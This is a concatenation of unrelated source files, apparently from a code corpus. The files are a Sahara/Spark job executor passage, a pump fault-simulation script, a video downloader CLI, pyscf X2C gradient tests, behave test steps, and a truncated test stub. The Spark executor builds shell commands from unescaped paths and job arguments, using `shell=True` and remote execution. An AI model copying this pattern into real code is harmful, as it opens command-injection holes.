if cores <= 0:
if 'cluster_size' in data.keys():
req_cluster_size = data['cluster_size']
else:
self._log("""%s | 'cluster_size' parameter missing"""
% (time.strftime("%H:%M:%S")))
raise ex.ConfigurationError()
else:
req_cluster_size = int(math.ceil(cores/float(cores_per_slave)))
# Check Oportunism
if opportunism == "True":
self._log("""%s | Checking if opportunistic instances
are available""" % (time.strftime("%H:%M:%S")))
pred_cluster_size = optimizer.get_cluster_size(
api.optimizer_url, hosts, percentage, dummy_opportunistic)
else:
pred_cluster_size = req_cluster_size
if pred_cluster_size > req_cluster_size:
cluster_size = pred_cluster_size
else:
cluster_size = req_cluster_size
self._log("%s | Cluster size: %s" %
(time.strftime("%H:%M:%S"), str(cluster_size)))
self._log("%s | Creating cluster..."
% (time.strftime("%H:%M:%S")))
cluster_id = self._create_cluster(sahara, connector,
req_cluster_size,
pred_cluster_size,
public_key, net_id, image_id,
plugin, version, master_ng,
slave_ng, op_slave_ng)
self._log("%s | Cluster id: %s" % (time.strftime("%H:%M:%S"),
cluster_id))
swift_path = self._is_swift_path(args)
if cluster_id:
master = connector.get_master_instance(
sahara, cluster_id)['internal_ip']
self._log("%s | Master is %s" %
(time.strftime("%H:%M:%S"), master))
workers = connector.get_worker_instances(sahara, cluster_id)
workers_id = []
for worker in workers:
workers_id.append(worker['instance_id'])
self._log("%s | Configuring controller" %
(time.strftime("%H:%M:%S")))
controller.setup_environment(api.controller_url, workers_id,
starting_cap, data)
if swift_path:
job_status = self._swift_spark_execution(
master, key_path, sahara, connector, job_binary_name,
job_binary_url, user, password, job_template_name,
job_type, plugin, cluster_size, args, main_class,
cluster_id, spark_applications_ids, workers_id, app_id,
expected_time, monitor_plugin, collect_period,
number_of_jobs, log_path, swift, container, data,
number_of_attempts)
else:
job_status = self._hdfs_spark_execution(
master, remote_hdfs, key_path, args, job_binary_url,
main_class, dependencies, spark_applications_ids,
expected_time, monitor_plugin, collect_period,
number_of_jobs, workers_id, data, connector, swift,
swift_logdir, container, number_of_attempts)
else:
# FIXME: exception type
self.update_application_state("Error")
raise ex.ClusterNotCreatedException()
# Delete cluster
self._log("%s | Delete cluster: %s" %
(time.strftime("%H:%M:%S"), cluster_id))
connector.delete_cluster(sahara, cluster_id)
self._log("%s | Finished application execution" %
(time.strftime("%H:%M:%S")))
return job_status
except KeyError as ke:
self._log("%s | Parameter missing in submission: %s, "
"please check the config file" %
(time.strftime("%H:%M:%S"), str(ke)))
self._log("%s | Finished application execution with error" %
(time.strftime("%H:%M:%S")))
self.update_application_state("Error")
except ex.ConfigurationError as ce:
self._log("%s | Finished application execution with error" %
(time.strftime("%H:%M:%S")))
self.update_application_state("Error")
except SaharaAPIException as se:
self._log("%s | There is not enough resource to create a cluster" %
(time.strftime("%H:%M:%S")))
self._log("%s | Finished application execution with error" %
(time.strftime("%H:%M:%S")))
self.update_application_state("Error")
except Exception as e:
if cluster_id is not None:
self._log("%s | Delete cluster: %s" %
(time.strftime("%H:%M:%S"), cluster_id))
connector.delete_cluster(sahara, cluster_id)
self._log("%s | Unknown error, please report to administrators "
"of WP3 infrastructure" % (time.strftime("%H:%M:%S")))
self._log("%s | Finished application execution with error" %
(time.strftime("%H:%M:%S")))
self.update_application_state("Error")
def get_application_time(self):
return self.application_time
def _get_job_binary_id(self, sahara, connector, job_binary_name,
job_binary_url, user, password):
extra = dict(user=user, password=password)
job_binary_id = connector.get_job_binary(sahara, job_binary_url)
if not job_binary_id:
job_binary_id = connector.create_job_binary(sahara,
job_binary_name,
job_binary_url, extra)
return job_binary_id
def _get_job_template_id(self, sahara, connector, mains, job_template_name,
job_type):
job_template_id = connector.get_job_template(sahara, mains)
if not job_template_id:
job_template_id = connector.create_job_template(sahara,
job_template_name,
job_type, mains)
return job_template_id
def _wait_on_job_finish(self, sahara, connector, job_exec_id,
spark_app_id):
completed = failed = False
start_time = datetime.datetime.now()
self.start_time = time.mktime(start_time.timetuple())
while not (completed or failed):
job_status = connector.get_job_status(sahara, job_exec_id)
self._log("%s | Sahara current job status: %s" %
(time.strftime("%H:%M:%S"), job_status))
if job_status == 'RUNNING':
time.sleep(2)
current_time = datetime.datetime.now()
current_job_time = (current_time - start_time).total_seconds()
if current_job_time > 3600:
self._log("%s | Job execution killed due to inactivity" %
time.strftime("%H:%M:%S"))
job_status = 'TIMEOUT'
completed = connector.is_job_completed(job_status)
failed = connector.is_job_failed(job_status)
end_time = datetime.datetime.now()
total_time = end_time - start_time
application_time_log.log("%s|%.0f|%.0f" % (
spark_app_id,
float(time.mktime(start_time.timetuple())),
float(total_time.total_seconds())))
self.application_time = total_time.total_seconds()
self._log("%s | Sahara job took %s seconds to execute" %
(time.strftime("%H:%M:%S"), str(total_time.total_seconds())))
return job_status
def _create_cluster(self, sahara, connector, req_cluster_size,
pred_cluster_size, public_key, net_id, image_id,
plugin, version, master_ng, slave_ng, op_slave_ng):
self._log('Creating cluster')
try:
cluster_id = connector.create_cluster(sahara, req_cluster_size,
pred_cluster_size,
public_key, net_id,
image_id, plugin,
version, master_ng,
slave_ng, op_slave_ng)
except SaharaAPIException:
raise SaharaAPIException('Could not create clusters')
return cluster_id
def _is_swift_path(self, args):
for arg in args:
if arg.startswith('hdfs://') or arg.startswith('swift://'):
if arg.startswith('swift://'):
return True
else:
return False
def _swift_spark_execution(self, master, key_path, sahara, connector,
job_binary_name, job_binary_url, user, password,
job_template_name, job_type, plugin,
cluster_size, args, main_class, cluster_id,
spark_applications_ids, workers_id, app_id,
expected_time, monitor_plugin, collect_period,
number_of_jobs, log_path, swift,
container, data, number_of_attempts):
# Preparing job
job_binary_id = self._get_job_binary_id(sahara, connector,
job_binary_name,
job_binary_url, user,
password)
mains = [job_binary_id]
job_template_id = self._get_job_template_id(sahara, connector,
mains,
job_template_name,
job_type)
self._log("%s | Starting job..." % (time.strftime("%H:%M:%S")))
# Running job
configs = os_utils.get_job_config(connector, plugin,
cluster_size, user, password,
args, main_class)
job = connector.create_job_execution(sahara, job_template_id,
cluster_id,
configs=configs)
self._log("%s | Created job" % (time.strftime("%H:%M:%S")))
spark_app_id = spark.get_running_app(master,
spark_applications_ids,
number_of_attempts)
spark_applications_ids.append(spark_app_id)
self._log("%s | Spark app id" % (time.strftime("%H:%M:%S")))
job_exec_id = job.id
for worker_id in workers_id:
instances_log.log("%s|%s" % (app_id, worker_id))
job_status = connector.get_job_status(sahara, job_exec_id)
self._log("%s | Sahara job status: %s" %
(time.strftime("%H:%M:%S"), job_status))
info_plugin = {"spark_submisson_url": "http://" + master,
"expected_time": expected_time,
"number_of_jobs": number_of_jobs}
self._log("%s | Starting monitor" % (time.strftime("%H:%M:%S")))
monitor.start_monitor(api.monitor_url, spark_app_id,
monitor_plugin, info_plugin, collect_period)
self._log("%s | Starting controller" % (time.strftime("%H:%M:%S")))
controller.start_controller(api.controller_url, spark_app_id,
workers_id, data)
job_status = self._wait_on_job_finish(sahara, connector,
job_exec_id, app_id)
self._log("%s | Stopping monitor" % (time.strftime("%H:%M:%S")))
monitor.stop_monitor(api.monitor_url, spark_app_id)
self._log("%s | Stopping controller" % (time.strftime("%H:%M:%S")))
controller.stop_controller(api.controller_url, spark_app_id)
spark_applications_ids.remove(spark_app_id)
self._log("Finished application execution")
if connector.is_job_completed(job_status):
self.update_application_state("OK")
if connector.is_job_failed(job_status):
self.update_application_state("Error")
return job_status
def _hdfs_spark_execution(self, master, remote_hdfs, key_path, args,
job_bin_url, main_class, dependencies,
spark_applications_ids, expected_time,
monitor_plugin, collect_period, number_of_jobs,
workers_id, data, connector, swift,
swift_logdir, container, number_of_attempts):
job_exec_id = str(uuid.uuid4())[0:7]
self._log("%s | Job execution ID: %s" %
(time.strftime("%H:%M:%S"), job_exec_id))
# Defining params
local_path = '/tmp/spark-jobs/' + job_exec_id + '/'
remote_path = 'ubuntu@' + master + ':' + local_path
job_input_paths, job_output_path, job_params = (
hdfs.get_job_params(key_path, remote_hdfs, args))
job_binary_path = hdfs.get_path(job_bin_url)
# Create temporary job directories
self._log("%s | Create temporary job directories" %
(time.strftime("%H:%M:%S")))
self._mkdir(local_path)
# Create cluster directories
self._log("%s | Creating cluster directories" %
(time.strftime("%H:%M:%S")))
remote.execute_command(master, key_path,
'mkdir -p %s' % local_path)
# Get job binary from hdfs
self._log("%s | Get job binary from hdfs" %
(time.strftime("%H:%M:%S")))
remote.copy_from_hdfs(master, key_path, remote_hdfs,
job_binary_path, local_path)
# Enabling event log on cluster
self._log("%s | Enabling event log on cluster" %
(time.strftime("%H:%M:%S")))
self._enable_event_log(master, key_path, local_path)
# Submit job
self._log("%s | Starting job" %
(time.strftime("%H:%M:%S")))
local_binary_file = (local_path + remote.list_directory(key_path,
master,
local_path))
spark_job = self._submit_job(master, key_path, main_class,
dependencies, local_binary_file, args)
spark_app_id = spark.get_running_app(master,
spark_applications_ids,
number_of_attempts)
if spark_app_id is None:
self._log("%s | Error on submission of application, "
"please check the config file" %
(time.strftime("%H:%M:%S")))
(output, err) = spark_job.communicate()
self.stdout.log(output)
self.stderr.log(err)
raise ex.ConfigurationError()
spark_applications_ids.append(spark_app_id)
info_plugin = {"spark_submisson_url": "http://" + master,
"expected_time": expected_time,
"number_of_jobs": number_of_jobs}
self._log("%s | Starting monitor" % (time.strftime("%H:%M:%S")))
monitor.start_monitor(api.monitor_url, spark_app_id,
monitor_plugin, info_plugin, collect_period)
self._log("%s | Starting controller" % (time.strftime("%H:%M:%S")))
controller.start_controller(api.controller_url, spark_app_id,
workers_id, data)
(output, err) = spark_job.communicate()
self._log("%s | Stopping monitor" % (time.strftime("%H:%M:%S")))
monitor.stop_monitor(api.monitor_url, spark_app_id)
self._log("%s | Stopping controller" % (time.strftime("%H:%M:%S")))
controller.stop_controller(api.controller_url, spark_app_id)
self.stdout.log(output)
self.stderr.log(err)
self._log("%s | Copy log from cluster" % (time.strftime("%H:%M:%S")))
event_log_path = local_path + 'eventlog/'
self._mkdir(event_log_path)
remote_event_log_path = 'ubuntu@%s:%s%s' % (master, local_path,
spark_app_id)
remote.copy(key_path, remote_event_log_path, event_log_path)
self._log("%s | Upload log to Swift" % (time.strftime("%H:%M:%S")))
connector.upload_directory(swift, event_log_path,
swift_logdir, container)
spark_applications_ids.remove(spark_app_id)
self.update_application_state("OK")
return 'OK'
def _submit_job(self, remote_instance, key_path, main_class,
dependencies, job_binary_file, args):
args_line = ''
for arg in args:
args_line += arg + ' '
spark_submit = ('/opt/spark/bin/spark-submit '
'--packages %(dependencies)s '
'--class %(main_class)s '
'--master spark://%(master)s:7077 '
'%(job_binary_file)s %(args)s ' %
{'dependencies': dependencies,
'main_class': main_class,
'master': remote_instance,
'job_binary_file': 'file://'+job_binary_file,
'args': args_line})
if main_class == '':
spark_submit = spark_submit.replace('--class', '')
if dependencies == '':
spark_submit = spark_submit.replace('--packages', '')
self._log("%s | spark-submit: %s" %
(time.strftime("%H:%M:%S"), spark_submit))
job = remote.execute_command_popen(remote_instance,
key_path,
spark_submit)
return job
def _enable_event_log(self, master, key_path, path):
enable_event_log_command = ("echo -e 'spark.executor.extraClassPath "
"/usr/lib/hadoop-mapreduce/hadoop-openstack.jar\n"
"spark.eventLog.enabled true\n"
"spark.eventLog.dir "
"file://%(path)s' > "
"/opt/spark/conf/spark-defaults.conf" % {'path': path})
remote.execute_command(master, key_path, enable_event_log_command)
def _log(self, string):
plugin_log.log(string)
self.running_log.log(string)
def _verify_existing_log_paths(self, app_id):
if not os.path.exists('logs'):
os.mkdir('logs')
elif not os.path.exists('logs/apps'):
os.mkdir('logs/apps')
if not os.path.exists('logs/apps/%s' % app_id):
os.mkdir('logs/apps/%s' % app_id)
def _clean_log_files(self, app_id):
running_log_file = open("logs/apps/%s/execution" % app_id, "w").close()
stdout_file = open("logs/apps/%s/stdout" % app_id, "w").close()
stderr_file = open("logs/apps/%s/stderr" % app_id, "w").close()
def _mkdir(self, path):
subprocess.call('mkdir -p %s' % path, shell=True)
class SaharaProvider(base.PluginInterface):
def __init__(self):
self.spark_applications_ids = []
self.id_generator = ID_Generator()
def get_title(self):
return 'OpenStack Sahara'
def get_description(self):
return 'Plugin that allows utilization of Sahara to run jobs'
def to_dict(self):
return {
'name': self.name,
'title': self.get_title(),
'description': self.get_description(),
}
def execute(self, data):
app_id = str(uuid.uuid4())[0:7]
executor = OpenStackSparkApplicationExecutor(app_id)
handling_thread = threading.Thread(target=executor.start_application,
args=(data,
self.spark_applications_ids,
app_id))
handling_thread.start()
return (app_id, executor)
| 1.6875 | 2 |
pump_script.py | hulsed/FFERMAT | 1 | 12786786 | <reponame>hulsed/FFERMAT<gh_stars>1-10
# -*- coding: utf-8 -*-
"""
File name: pump_script.py
Author: <NAME>
Created: October 2019
Description: A simple example of I/O using faultprop.py and the pump model in ex_pump.py
"""
#Using the model that was set up, we can now perform a few different operations
#First, import the fault propogation library as well as the model
import faultprop as fp
import ex_pump as mdl
#Before seeing how faults propogate, it's useful to see how the model performs
#in the nominal state to check to see that the model has been defined correctly.
# Some things worth checking:
# -are all functions on the graph?
# -are the functions connected with the correct flows?
# -do any faults occur in the nominal state?
# -do all the flow states proceed as desired over time?
endresults, resgraph, flowhist, ghist=fp.runnominal(mdl, track={'Wat_1','Wat_2', 'EE_1', 'Sig_1'})
fp.showgraph(resgraph)
fp.plotflowhist(flowhist, 'Nominal')
#We might further query the faults to see what happens to the various states
endresults, resgraph, flowhist, ghist=fp.proponefault(mdl, 'Move Water', 'short', time=10, track={'Wat_1','Wat_2', 'EE_1', 'Sig_1'})
fp.showgraph(resgraph)
fp.plotflowhist(flowhist, 'short', time=10)
t=fp.printresult('Move Water', 'short', 10, endresults)
print(t)
#in addition to these visualizations, we can also look at the final results
#to see which specific faults were caused, as well as the flow states
#print(endresults)
#we can also look at other faults
endresults, resgraph, flowhist, ghist=fp.proponefault(mdl, 'Export Water', 'block', time=10, track={'Wat_1','Wat_2', 'EE_1', 'Sig_1'})
fp.showgraph(resgraph)
fp.plotflowhist(flowhist, 'blockage', time=10)
t=fp.printresult('Export Water', 'block', 10, endresults)
print(t)
#you can save to a csv this with:
#t.write('tab.ecsv', overwrite=True)
#finally, to get the results of all of the scenarios, we can go through the list
#note that this will propogate faults based on the times vector put in the model,
# e.g. times=[0,3,15,55] will propogate the faults at the begining, end, and at
# t=15 and t=15
resultsdict, resultstab=fp.proplist(mdl)
print(resultstab)
# resultstab.write('tab.ecsv', overwrite=True) | 2.46875 | 2 |
main.py | Kiritow/PHDownloader | 1 | 12786787 | from mtdownloader import MTDownloader
from mtdownloader import readable as readableSize
from phuburl import resolver as PageResolver
import requests
import json
import time
def readableTime(s):
s=int(s)
if(s<60):
return '{}s'.format(s)
elif(s<3600):
return '{}m{}s'.format(s//60,s%60)
else:
return '{}h{}m{}s'.format(s//3600,(s%3600)//60,s%60)
def readConfig():
try:
with open('config.json') as f:
config=json.loads(f.read())
return config
except FileNotFoundError:
print('Unable to read config.')
return None
def setupConfig():
print('Welcome to PHDownloader config setup.')
config={}
str=input('Use proxy? (Y/n): ')
if(str=='' or str.lower()=='y'):
config["useProxy"]=True
config["proxy"]={}
str=input('http proxy (http://127.0.0.1:1080): ')
if(str!=''):
config["proxy"]["http"]=str
else:
config["proxy"]["http"]='http://127.0.0.1:1080'
str=input('https proxy (https://127.0.0.1:1080): ')
if(str!=''):
config["proxy"]["https"]=str
else:
config["proxy"]["https"]='https://127.0.0.1:1080'
else:
config["useProxy"]=False
config["proxy"]={"http":"http://127.0.0.1:1080","https":"https://127.0.0.1:1080"}
str=input("Use timeout? (None): ")
if(str=='' or str.lower()=='none'):
config["timeout"]=None
else:
config["timeout"]=int(str)
str=input("Use debug? (y/N): ")
if(str=='' or str.lower()=='n'):
config["debug"]=False
else:
config["debug"]=True
str=input("Allow overwrite? (y/N): ")
if(str=='' or str.lower()=='n'):
config["overwrite"]=False
else:
config["overwrite"]=True
with open('config.json','w') as f:
f.write(json.dumps(config,indent=4))
print('Config saved to `config.json`')
return config
if __name__ == "__main__":
config=readConfig()
if(config is None):
config=setupConfig()
if(config["useProxy"]):
theProxy=config["proxy"]
else:
theProxy=None
while True:
try:
url=input('Please input URL: ')
except EOFError:
break
try:
print('[BEGIN] {}'.format(url))
res=requests.get(url,proxies=theProxy)
info=PageResolver(res.text)
print(info)
downloader=MTDownloader(info['url'],filename=info['name'],overwrite=config["overwrite"],timeout=config["timeout"],proxy=theProxy,debug=config["debug"])
time_before=time.time()
downloader.start()
downloader.wait()
time_diff=time.time()-time_before
print('[DONE] {} ({} in {} at {})'.format(info["name"],
readableSize(downloader.length),readableTime(time_diff),
'{}/s'.format(readableSize(downloader.length/time_diff))))
except Exception as e:
print('[Error] {}'.format(e))
| 2.53125 | 3 |
pyscf/x2c/test/test_x2c_grad.py | robert-anderson/pyscf | 501 | 12786788 | #!/usr/bin/env python
# Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import reduce
import unittest
import numpy
import scipy.linalg
from pyscf import lib
from pyscf import gto
from pyscf.x2c import sfx2c1e
from pyscf.x2c import sfx2c1e_grad
def _sqrt0(a):
w, v = scipy.linalg.eigh(a)
return numpy.dot(v*numpy.sqrt(w), v.conj().T)
def _invsqrt0(a):
w, v = scipy.linalg.eigh(a)
return numpy.dot(v/numpy.sqrt(w), v.conj().T)
def _sqrt1(a0, a1):
'''Solving first order of x^2 = a'''
w, v = scipy.linalg.eigh(a0)
w = numpy.sqrt(w)
a1 = reduce(numpy.dot, (v.conj().T, a1, v))
x1 = a1 / (w[:,None] + w)
x1 = reduce(numpy.dot, (v, x1, v.conj().T))
return x1
def _invsqrt1(a0, a1):
'''Solving first order of x^2 = a^{-1}'''
w, v = scipy.linalg.eigh(a0)
w = 1./numpy.sqrt(w)
a1 = -reduce(numpy.dot, (v.conj().T, a1, v))
x1 = numpy.einsum('i,ij,j->ij', w**2, a1, w**2) / (w[:,None] + w)
x1 = reduce(numpy.dot, (v, x1, v.conj().T))
return x1
def get_R(mol):
s0 = mol.intor('int1e_ovlp')
t0 = mol.intor('int1e_kin')
s0sqrt = _sqrt0(s0)
s0invsqrt = _invsqrt0(s0)
x0 = get_x0(mol)
c = lib.param.LIGHT_SPEED
stild = s0 + reduce(numpy.dot, (x0.T, t0*(.5/c**2), x0))
R = _invsqrt0(reduce(numpy.dot, (s0invsqrt, stild, s0invsqrt)))
R = reduce(numpy.dot, (s0invsqrt, R, s0sqrt))
return R
def get_r1(mol, atm_id, pos):
# See JCP 135 084114, Eq (34)
c = lib.param.LIGHT_SPEED
aoslices = mol.aoslice_by_atom()
ish0, ish1, p0, p1 = aoslices[atm_id]
s0 = mol.intor('int1e_ovlp')
t0 = mol.intor('int1e_kin')
s1all = mol.intor('int1e_ipovlp', comp=3)
t1all = mol.intor('int1e_ipkin', comp=3)
s1 = numpy.zeros_like(s0)
t1 = numpy.zeros_like(t0)
s1[p0:p1,:] =-s1all[pos][p0:p1]
s1[:,p0:p1] -= s1all[pos][p0:p1].T
t1[p0:p1,:] =-t1all[pos][p0:p1]
t1[:,p0:p1] -= t1all[pos][p0:p1].T
x0 = get_x0(mol)
x1 = get_x1(mol, atm_id)[pos]
sa0 = s0 + reduce(numpy.dot, (x0.T, t0*(.5/c**2), x0))
sa1 = s1 + reduce(numpy.dot, (x0.T, t1*(.5/c**2), x0))
sa1+= reduce(numpy.dot, (x1.T, t0*(.5/c**2), x0))
sa1+= reduce(numpy.dot, (x0.T, t0*(.5/c**2), x1))
s0_sqrt = _sqrt0(s0)
s0_invsqrt = _invsqrt0(s0)
s1_sqrt = _sqrt1(s0, s1)
s1_invsqrt = _invsqrt1(s0, s1)
R0_part = reduce(numpy.dot, (s0_invsqrt, sa0, s0_invsqrt))
R1_part = (reduce(numpy.dot, (s0_invsqrt, sa1, s0_invsqrt)) +
reduce(numpy.dot, (s1_invsqrt, sa0, s0_invsqrt)) +
reduce(numpy.dot, (s0_invsqrt, sa0, s1_invsqrt)))
R1 = reduce(numpy.dot, (s0_invsqrt, _invsqrt1(R0_part, R1_part), s0_sqrt))
R1 += reduce(numpy.dot, (s1_invsqrt, _invsqrt0(R0_part), s0_sqrt))
R1 += reduce(numpy.dot, (s0_invsqrt, _invsqrt0(R0_part), s1_sqrt))
return R1
def get_h0_s0(mol):
s = mol.intor_symmetric('int1e_ovlp')
t = mol.intor_symmetric('int1e_kin')
v = mol.intor_symmetric('int1e_nuc')
w = mol.intor_symmetric('int1e_pnucp')
nao = s.shape[0]
n2 = nao * 2
h = numpy.zeros((n2,n2), dtype=v.dtype)
m = numpy.zeros((n2,n2), dtype=v.dtype)
c = lib.param.LIGHT_SPEED
h[:nao,:nao] = v
h[:nao,nao:] = t
h[nao:,:nao] = t
h[nao:,nao:] = w * (.25/c**2) - t
m[:nao,:nao] = s
m[nao:,nao:] = t * (.5/c**2)
return h, m
def get_h1_s1(mol, ia):
aoslices = mol.aoslice_by_atom()
ish0, ish1, p0, p1 = aoslices[0]
nao = mol.nao_nr()
s1 = mol.intor('int1e_ipovlp', comp=3)
t1 = mol.intor('int1e_ipkin', comp=3)
v1 = mol.intor('int1e_ipnuc', comp=3)
w1 = mol.intor('int1e_ipspnucsp', comp=12).reshape(3,4,nao,nao)[:,3]
with mol.with_rinv_origin(mol.atom_coord(ia)):
rinv1 = -8*mol.intor('int1e_iprinv', comp=3)
prinvp1 = -8*mol.intor('int1e_ipsprinvsp', comp=12).reshape(3,4,nao,nao)[:,3]
n2 = nao * 2
h = numpy.zeros((3,n2,n2), dtype=v1.dtype)
m = numpy.zeros((3,n2,n2), dtype=v1.dtype)
rinv1[:,p0:p1,:] -= v1[:,p0:p1]
rinv1 = rinv1 + rinv1.transpose(0,2,1).conj()
prinvp1[:,p0:p1,:] -= w1[:,p0:p1]
prinvp1 = prinvp1 + prinvp1.transpose(0,2,1).conj()
s1ao = numpy.zeros_like(s1)
t1ao = numpy.zeros_like(t1)
s1ao[:,p0:p1,:] = -s1[:,p0:p1]
s1ao[:,:,p0:p1]+= -s1[:,p0:p1].transpose(0,2,1)
t1ao[:,p0:p1,:] = -t1[:,p0:p1]
t1ao[:,:,p0:p1]+= -t1[:,p0:p1].transpose(0,2,1)
c = lib.param.LIGHT_SPEED
h[:,:nao,:nao] = rinv1
h[:,:nao,nao:] = t1ao
h[:,nao:,:nao] = t1ao
h[:,nao:,nao:] = prinvp1 * (.25/c**2) - t1ao
m[:,:nao,:nao] = s1ao
m[:,nao:,nao:] = t1ao * (.5/c**2)
return h, m
def get_x0(mol):
c = lib.param.LIGHT_SPEED
h0, s0 = get_h0_s0(mol)
e, c = scipy.linalg.eigh(h0, s0)
nao = mol.nao_nr()
cl = c[:nao,nao:]
cs = c[nao:,nao:]
x0 = scipy.linalg.solve(cl.T, cs.T).T
return x0
def get_x1(mol, ia):
h0, s0 = get_h0_s0(mol)
h1, s1 = get_h1_s1(mol, ia)
e0, c0 = scipy.linalg.eigh(h0, s0)
nao = mol.nao_nr()
cl0 = c0[:nao,nao:]
cs0 = c0[nao:,nao:]
x0 = scipy.linalg.solve(cl0.T, cs0.T).T
h1 = numpy.einsum('pi,xpq,qj->xij', c0.conj(), h1, c0[:,nao:])
s1 = numpy.einsum('pi,xpq,qj->xij', c0.conj(), s1, c0[:,nao:])
epi = e0[:,None] - e0[nao:]
degen_mask = abs(epi) < 1e-7
epi[degen_mask] = 1e200
c1 = (h1 - s1 * e0[nao:]) / -epi
c1[:,degen_mask] = -.5 * s1[:,degen_mask]
c1 = numpy.einsum('pq,xqi->xpi', c0, c1)
cl1 = c1[:,:nao]
cs1 = c1[:,nao:]
x1 = [scipy.linalg.solve(cl0.T, (cs1[i] - x0.dot(cl1[i])).T).T
for i in range(3)]
return numpy.asarray(x1)
mol1 = gto.M(
verbose = 0,
atom = [["O" , (0. , 0. , 0.0001)],
[1 , (0. , -0.757 , 0.587)],
[1 , (0. , 0.757 , 0.587)]],
basis = '3-21g',
)
mol2 = gto.M(
verbose = 0,
atom = [["O" , (0. , 0. ,-0.0001)],
[1 , (0. , -0.757 , 0.587)],
[1 , (0. , 0.757 , 0.587)]],
basis = '3-21g',
)
mol = gto.M(
verbose = 0,
atom = [["O" , (0. , 0. , 0. )],
[1 , (0. , -0.757 , 0.587)],
[1 , (0. , 0.757 , 0.587)]],
basis = '3-21g',
)
class KnownValues(unittest.TestCase):
def test_x1(self):
with lib.light_speed(10) as c:
x_1 = get_x0(mol1)
x_2 = get_x0(mol2)
x1_ref = (x_1 - x_2) / 0.0002 * lib.param.BOHR
x1t = get_x1(mol, 0)
self.assertAlmostEqual(abs(x1t[2]-x1_ref).max(), 0, 7)
x0 = get_x0(mol)
h0, s0 = get_h0_s0(mol)
e0, c0 = scipy.linalg.eigh(h0, s0)
get_h1_etc = sfx2c1e_grad._gen_first_order_quantities(mol, e0, c0, x0)
x1 = get_h1_etc(0)[4]
self.assertAlmostEqual(abs(x1-x1t).max(), 0, 9)
def test_R1(self):
with lib.light_speed(10) as c:
R_1 = get_R(mol1)
R_2 = get_R(mol2)
R1_ref = (R_1 - R_2) / 0.0002 * lib.param.BOHR
R1t = get_r1(mol, 0, 2)
self.assertAlmostEqual(abs(R1t-R1_ref).max(), 0, 7)
x0 = get_x0(mol)
h0, s0 = get_h0_s0(mol)
e0, c0 = scipy.linalg.eigh(h0, s0)
get_h1_etc = sfx2c1e_grad._gen_first_order_quantities(mol, e0, c0, x0)
R1 = get_h1_etc(0)[6][2]
self.assertAlmostEqual(abs(R1-R1t).max(), 0, 9)
def test_hfw(self):
with lib.light_speed(10) as c:
x2c_1 = sfx2c1e.SpinFreeX2C(mol1)
x2c_2 = sfx2c1e.SpinFreeX2C(mol2)
x2cobj = sfx2c1e.SpinFreeX2C(mol)
fh_ref = (x2c_1.get_hcore() - x2c_2.get_hcore()) / 0.0002 * lib.param.BOHR
fh = x2cobj.hcore_deriv_generator(deriv=1)
self.assertAlmostEqual(abs(fh(0)[2] - fh_ref).max(), 0, 7)
x2c_1.xuncontract = 0
x2c_2.xuncontract = 0
x2cobj.xuncontract =0
fh_ref = (x2c_1.get_hcore() - x2c_2.get_hcore()) / 0.0002 * lib.param.BOHR
fh = x2cobj.hcore_deriv_generator(deriv=1)
self.assertAlmostEqual(abs(fh(0)[2] - fh_ref).max(), 0, 7)
x2c_1.xuncontract = 1
x2c_2.xuncontract = 1
x2cobj.xuncontract =1
x2c_1.approx = 'ATOM1E'
x2c_2.approx = 'ATOM1E'
x2cobj.approx = 'ATOM1E'
fh_ref = (x2c_1.get_hcore() - x2c_2.get_hcore()) / 0.0002 * lib.param.BOHR
fh = x2cobj.hcore_deriv_generator(deriv=1)
self.assertAlmostEqual(abs(fh(0)[2] - fh_ref).max(), 0, 7)
if __name__ == "__main__":
print("Full Tests for sfx2c1e gradients")
unittest.main()
| 2.375 | 2 |
WordModel1.py | MengZhang0904/Learn_New_World | 0 | 12786789 | <filename>WordModel1.py<gh_stars>0
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import style
style.use('ggplot')
import seaborn as sns
from gensim.models import Word2Vec
def find_pct(word,age):
df = pd.read_csv('word_acq_pct1.csv')
row = df[df.definition2 == word]
pct = row.iloc[0][int(age)]
pct = pct*100
pct = int(pct)
return pct
def word_trajectory(df,word,age):
x = list(range(16,31))
print(x)
len(x)
y = np.array(df[df.definition2 == word])
y = y[0,1:]
type(y)
y =y.astype(float)
print(y)
len(y)
from matplotlib import style
style.use('ggplot')
plt.rcParams.update({'font.size': 13})
# set customized color for dots
color1 = ['dodgerblue' for x in range(16,31)]
idx = int(age) - 16
color1[idx] = 'crimson'
color2 = color1
ax = sns.regplot(x, y,logistic=True, marker = 'o',scatter_kws={'facecolors':color2,'s':65,'edgecolor':'none'},line_kws={'color':'y','linewidth':4.0})
plt.rcParams.update({'font.size': 13})
ax.set(xlabel='Age(Month)', ylabel='Proportion of Kids Knowing This Word')
save_name = 'static/plots/' + word + age + '.png'
print(save_name)
get_name = '../static/plots/' + word + age + '.png'
print(get_name)
plt.savefig(save_name)
return get_name
def same_mo(age,word):
file = 'dataset/w2v_' + age + '_mo_s1500.bin'
model = Word2Vec.load(file)
similar_w = model.most_similar(word)
words, score = zip(*similar_w)
return words
| 2.8125 | 3 |
tests/featuresInPortuguese/steps/contact_steps.py | Schveitzer/selenium-python-bdd-behave-example | 0 | 12786790 | <gh_stars>0
from behave import step
from nose.tools import assert_equal
from constants import system_messages, system_label
@step("eu clico no botão contato para abrir a página de contato")
def step_impl(context):
context.contact_page.contact_link().click()
context.helper.wait_for_element_is_visible(context.contact_page.contact_page_header())
@step("sistema exibe o título da página de contato")
def step_impl(context):
context.helper.wait_for_element_is_visible(context.contact_page.contact_page_header())
assert_equal(context.contact_page.contact_page_header().text, system_label.CUSTOMER_SERVICE_LABEL)
@step("eu envio uma mensagem com documento")
def step_impl(context):
content = {
"subject": "Customer service",
"message": "My message test",
"file": "test.pdf"
}
context.contact_page.send_menssage(content)
@step("sistema exibe mensagem de menssagem enviada com sucesso")
def step_impl(context):
context.helper.wait_for_element_is_visible(context.contact_page.sucess_message())
assert_equal(context.contact_page.sucess_message().text, system_messages.MESSAGE_SENT)
| 2.28125 | 2 |
tests/tests_verbs/test_order_by.py | fredzett/datastack | 0 | 12786791 | from datastack import DataTable, DataColumn, label, col, desc
import pytest
import numpy as np
def test_one():
